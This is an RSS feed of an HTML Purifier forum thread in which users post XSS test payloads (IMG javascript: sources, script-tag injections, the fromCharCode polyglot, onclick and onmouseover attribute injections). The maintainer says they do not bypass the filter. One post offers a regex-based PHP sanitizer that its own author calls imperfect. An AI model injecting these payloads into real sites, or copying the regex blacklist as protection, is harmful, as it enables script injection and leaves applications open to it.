<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
    <channel>
        <title>This code works on htmlpurifier</title>
        <description> i got it from http://ha.ckers.org/xss.html and it works on my form.</description>
        <link>http://htmlpurifier.org/phorum/read.php?4,3527,3527#msg-3527</link>
        <lastBuildDate>Wed, 22 May 2013 02:32:50 -0400</lastBuildDate>
        <generator>Phorum 5.2.18</generator>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,6037#msg-6037</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,6037#msg-6037</link>
            <description><![CDATA[<p>" onclick='alert(50)' "</p>

<p>But i can't test it here, it's only in a hmtl input field.
saved to database and rerender</p>

<p>THe code with tags are filtered correctly.
i cannont proove it here, but all my tests are working.</p>

<p>i used this to prevent all javascript .</p>

<pre>				$value =	preg_replace('@&lt;[\/\!]*?[^&lt;&gt;]*?&gt;@si','',$value);//remove all html tags
				$value =	(string)preg_replace('#on[a-z](.+?)\)#si','',$value);//replace start of script onclick() onload()...
				$value = trim(str_replace('"', ' ', $value),"'") ;
				$value =	(string)preg_replace('#^\'#si','',$value);//replace ' at start</pre>

<p>BUt it's not perfect because this can remove unwanted chars.</p>]]></description>
            <dc:creator>electrocity</dc:creator>
            <category>Test</category>
            <pubDate>Sat, 26 Nov 2011 07:50:13 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,5991#msg-5991</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,5991#msg-5991</link>
            <description><![CDATA[<p>jjjj</p>
]]></description>
            <dc:creator>al</dc:creator>
            <category>Test</category>
            <pubDate>Sat, 05 Nov 2011 08:39:59 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,5937#msg-5937</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,5937#msg-5937</link>
            <description><![CDATA[<p>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;</p>]]></description>
            <dc:creator>Brian</dc:creator>
            <category>Test</category>
            <pubDate>Wed, 14 Sep 2011 00:36:19 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,5880#msg-5880</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,5880#msg-5880</link>
            <description><![CDATA[<p>'onmouseover=prompt(934419) bad='</p>]]></description>
            <dc:creator>Philip</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 30 Aug 2011 07:27:04 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4737#msg-4737</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4737#msg-4737</link>
            <description><![CDATA[<p><a href="http://aeno.co.cc/abc/">aeno.co.cc/abc/</a></p>]]></description>
            <dc:creator>aeno</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 15 Jul 2010 14:07:25 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4736#msg-4736</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4736#msg-4736</link>
            <description><![CDATA[<pre>&lt;a href="<a href="http://aeno.co.cc/abc/">http://aeno.co.cc/abc/</a>" target="_blank"&gt;aeno.co.cc/abc/&lt;/a&gt;</pre>]]></description>
            <dc:creator>aeno</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 15 Jul 2010 14:06:32 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4281#msg-4281</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4281#msg-4281</link>
            <description><![CDATA[<p>very nice</p>]]></description>
            <dc:creator>Woogie</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 04 Feb 2010 21:33:47 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4280#msg-4280</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4280#msg-4280</link>
            <description><![CDATA[<p>žscriptualert(EXSSE)ž/scriptu</p>]]></description>
            <dc:creator>Woogie</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 04 Feb 2010 21:33:11 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4279#msg-4279</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4279#msg-4279</link>
            <description><![CDATA[]]></description>
            <dc:creator>Woogie</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 04 Feb 2010 21:29:39 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4278#msg-4278</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4278#msg-4278</link>
            <description><![CDATA[]]></description>
            <dc:creator>Woogie</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 04 Feb 2010 21:27:08 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,4277#msg-4277</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,4277#msg-4277</link>
            <description><![CDATA[<p>';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;"&gt;'&gt;</p>]]></description>
            <dc:creator>Woogie</dc:creator>
            <category>Test</category>
            <pubDate>Thu, 04 Feb 2010 21:25:51 -0500</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,3531#msg-3531</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,3531#msg-3531</link>
            <description><![CDATA[<p>See also: <a href="http://htmlpurifier.org/live/smoketests/xssAttacks.php">http://htmlpurifier.org/live/smoketests/xssAttacks.php</a></p>]]></description>
            <dc:creator>Ambush Commander</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 19 May 2009 01:12:25 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,3530#msg-3530</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,3530#msg-3530</link>
            <description><![CDATA[<p>Uhhh... no it doesn't.</p>]]></description>
            <dc:creator>Ambush Commander</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 19 May 2009 01:11:44 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,3529#msg-3529</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,3529#msg-3529</link>
            <description><![CDATA[<p>This xss code works too 
</p>

<pre>
&lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt;
</pre>]]></description>
            <dc:creator>Saud</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 19 May 2009 01:07:39 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,3528#msg-3528</guid>
            <title>Re: This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,3528#msg-3528</link>
            <description><![CDATA[<pre>
&lt;IMG SRC="javascript:alert('XSS');"&gt;
</pre>

<p>i got it from <a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a> and it works on my form.</p>]]></description>
            <dc:creator>Saud</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 19 May 2009 00:58:34 -0400</pubDate>
        </item>
        <item>
            <guid>http://htmlpurifier.org/phorum/read.php?4,3527,3527#msg-3527</guid>
            <title>This code works on htmlpurifier</title>
            <link>http://htmlpurifier.org/phorum/read.php?4,3527,3527#msg-3527</link>
            <description><![CDATA[<p> i got it from <a href="http://ha.ckers.org/xss.html">http://ha.ckers.org/xss.html</a> and it works on my form.</p>]]></description>
            <dc:creator>Saud</dc:creator>
            <category>Test</category>
            <pubDate>Tue, 19 May 2009 00:57:27 -0400</pubDate>
        </item>
    </channel>
</rss>
